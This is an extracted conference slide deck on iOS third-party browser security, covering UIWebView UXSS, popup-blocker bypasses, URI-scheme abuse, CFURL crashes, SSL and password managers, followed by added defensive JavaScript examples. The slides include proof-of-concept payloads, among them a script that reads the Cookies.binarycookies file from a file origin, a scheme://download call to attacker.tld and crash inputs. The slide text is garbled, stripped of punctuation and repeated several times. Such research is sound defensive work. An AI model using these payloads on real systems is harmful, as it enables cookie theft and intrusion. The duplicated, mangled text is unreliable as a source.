• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?

lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
Popup blockers
• Browsers that rewrite href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway: a registered URI scheme launches the other app without any click…
URI schemes
• Native (WebKit)
• Application (bolted-on)
• Bridge (internal)
• Registered (external)
Examples of internal schemes that web content can trigger:
  scheme://download?http://secure.tld/victim/data
  scheme://download?http://attacker.tld/README.html
  scheme://add-filter?url=…
CFURL NULL pointer dereference
• Any CFURL function that gets NULL as an argument (the result of a failed URL parse) dereferences a NULL pointer
• Tested with percent encoding: http:%, http:%5, http:%5c etc.
• Example, Opera Coast: <script>document.location = 'http:%5c'</script>
Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315)
  <iframe src="lets-try-format-string:%p%p%p%p…">
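An added example covering the popup-blocker, URI-scheme and CFURL slides above: the decision a browser app would make in webView:shouldStartLoadWithRequest:navigationType:, written in JavaScript so the rules can be run over the deck's cases. This is not code from the deck or from any browser it discusses; the bridge scheme name (mybrowser), its command table, the external-scheme allowlist and the shape of the request object are assumptions for the example.

```javascript
// Added example, not code from the deck: the navigation policy a browser app should
// apply in webView:shouldStartLoadWithRequest:navigationType:, written in JavaScript
// so it can be exercised with the deck's cases. Scheme names, the bridge command
// table and the shape of `req` are assumptions for the example.

const BRIDGE_SCHEME = 'mybrowser';                 // assumed internal JS -> Objective-C scheme
const BRIDGE_COMMANDS = new Set(['add-filter']);   // 'download' is deliberately not reachable from pages
const EXTERNAL_SCHEMES = new Set(['googlechrome', 'merc', 'mailto', 'tel']);  // assumed allowlist

// req: { url, isTopFrame, userGesture }  (constructed shape of a navigation request)
function decideNavigation(req) {
  let u;
  try {
    u = new URL(req.url);   // stand-in for NSURL/CFURL parsing
  } catch (e) {
    // NSURL URLWithString: returns nil and CFURLCreateWithString NULL for such strings;
    // stop here instead of handing the result to CFURLCopyPath & co. (the Opera Coast crash).
    return { action: 'block', reason: 'unparseable URL' };
  }
  const scheme = u.protocol.slice(0, -1).toLowerCase();

  // Native (WebKit): ordinary web navigation
  if (scheme === 'http' || scheme === 'https' || scheme === 'about') {
    return { action: 'load' };
  }

  // Local origins must never be reachable from web content
  if (scheme === 'file' || scheme === 'applewebdata') {
    return { action: 'block', reason: 'local origin requested by content' };
  }

  // Bridge (internal): allowlisted commands only, top frame only, on a user gesture,
  // and every URL argument must itself be http(s), so a page cannot smuggle file:// in.
  if (scheme === BRIDGE_SCHEME) {
    const command = u.hostname.toLowerCase();         // mybrowser://add-filter?url=...
    if (!req.isTopFrame || !req.userGesture) {
      return { action: 'block', reason: 'bridge call without user gesture in top frame' };
    }
    if (!BRIDGE_COMMANDS.has(command)) {
      return { action: 'block', reason: 'bridge command not exposed: ' + command };
    }
    const params = Object.fromEntries(u.searchParams);
    for (const [k, v] of Object.entries(params)) {
      if (/url$/i.test(k) && !/^https?:\/\//i.test(v)) {
        return { action: 'block', reason: 'non-http URL argument in ' + k };
      }
    }
    return { action: 'bridge', command, params };
  }

  // Registered (external): launching another app is a popup-like side effect.
  // Only an allowlisted scheme, only from the top frame, only on a real user
  // gesture, which an <iframe src="googlechrome://..."> never has.
  if (EXTERNAL_SCHEMES.has(scheme) && req.isTopFrame && req.userGesture) {
    return { action: 'open-external', scheme };
  }
  return { action: 'block', reason: 'external scheme ' + scheme + ' without user gesture' };
}
```

The order matters: parse failure is decided first, before any scheme logic, because that is the case the CFURL functions cannot survive; the slide's scheme://download?http://attacker.tld/README.html is stopped not by inspecting its argument but by never exposing a download command to page content at all.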
SSL
• By default, iOS UIWebView rejects https requests with invalid certificates, without any user interaction
• This can be changed (e.g. to let a user accept a self-signed certificate)
• In 1/4 of the tested browsers self-signed SSL certificates are silently accepted
• In some cases validation is done for the main domain only (e.g. Opera Coast < 3.02), so frames and subresources from other hosts go unchecked
SSL & password managers
Password managers
• Implemented as JavaScript with the privileges of the top frame -> passwords are not filled into subframes
• Usually possible to force saving a password for another domain (with or without user interaction)
• Password filling checks the domain but not always the URL scheme (https vs http), so a credential saved for https can be harvested by a network attacker on http
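An added example, not code from the deck or from any browser it discusses, serving two slides: the password-manager rules above and the "custom SOP implementation" from the Content-Disposition slide that is fooled by window.open('https://' + location.hostname). It contrasts the hostname-only checks the deck describes with checks on the full origin WebKit reports (self.origin), which is 'null' for an isolated attachment, a file:// page or an applewebdata:// page. The credential store, the document objects and the function names are constructed for the example.

```javascript
// Added example, not code from the deck. Two bolted-on checks that third-party
// browsers implement in injected JavaScript: "may this document write into that
// tab?" and "may I fill the saved password into this form?". The weak versions
// compare hostnames, as the deck describes; the hardened ones compare full origins
// (scheme, host, port), refuse subframes and refuse 'null' origins, i.e. the
// isolated attachment origin, file:// and applewebdata://.

function originOf(url) {
  try {
    return new URL(url).origin;  // 'null' for file:, applewebdata: and other opaque cases
  } catch (e) {
    return 'null';               // unparseable: treat as opaque, never as a match
  }
}

// Weak check (the deck's "custom SOP implementation"): hostname only. An attachment
// rendered in its isolated origin still reports the hosting site in location.hostname,
// so window.open('https://' + location.hostname) + document.write passes.
function weakSameSite(docUrl, targetUrl) {
  return new URL(docUrl).hostname === new URL(targetUrl).hostname;
}

// Hardened: compare the origin WebKit reports for the document (self.origin), not the
// host in its URL. doc = { url, origin, isTopFrame } (constructed shape).
function mayWriteInto(sourceDoc, targetDoc) {
  if (sourceDoc.origin === 'null' || targetDoc.origin === 'null') return false;
  return sourceDoc.origin === targetDoc.origin;
}

// Password store keyed by the origin a credential was saved for (constructed data).
const VAULT = [
  { origin: 'https://bank.example', username: 'alice', password: 'hunter2' },
];

// Weak autofill, as on the slide: checks the domain but not the scheme, fills subframes.
function weakFind(doc) {
  const host = new URL(doc.url).hostname;
  return VAULT.find(c => new URL(c.origin).hostname === host) || null;
}

// Hardened autofill: top frame only; exact origin, so http://bank.example and
// https://bank.example:8443 never receive the https credential; no 'null' origins.
function safeFind(doc) {
  if (!doc.isTopFrame) return null;
  const origin = doc.origin !== undefined ? doc.origin : originOf(doc.url);
  if (origin === 'null') return null;
  return VAULT.find(c => c.origin === origin) || null;
}

// Saving: key the credential by the submitting top-level document's own origin, never
// by something the page controls (form action, a hidden field, a query parameter),
// which is how "saving a password for another domain" gets forced.
function saveCredential(doc, username, password) {
  if (!doc.isTopFrame) return false;
  const origin = doc.origin !== undefined ? doc.origin : originOf(doc.url);
  if (origin === 'null' || !/^https?:/.test(origin)) return false;
  VAULT.push({ origin, username, password });
  return true;
}
```

Whether a browser can obtain the real origin depends on how its tabs are built: a window created through WebKit itself (on iOS 8, via WKUIDelegate's createWebViewWithConfiguration:forNavigationAction:windowFeatures:) gets WebKit's own same-origin enforcement and makes the mayWriteInto check unnecessary; a tab emulated in the app's JavaScript has to do this comparison itself, and must do it on origins, not hostnames.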
Summary
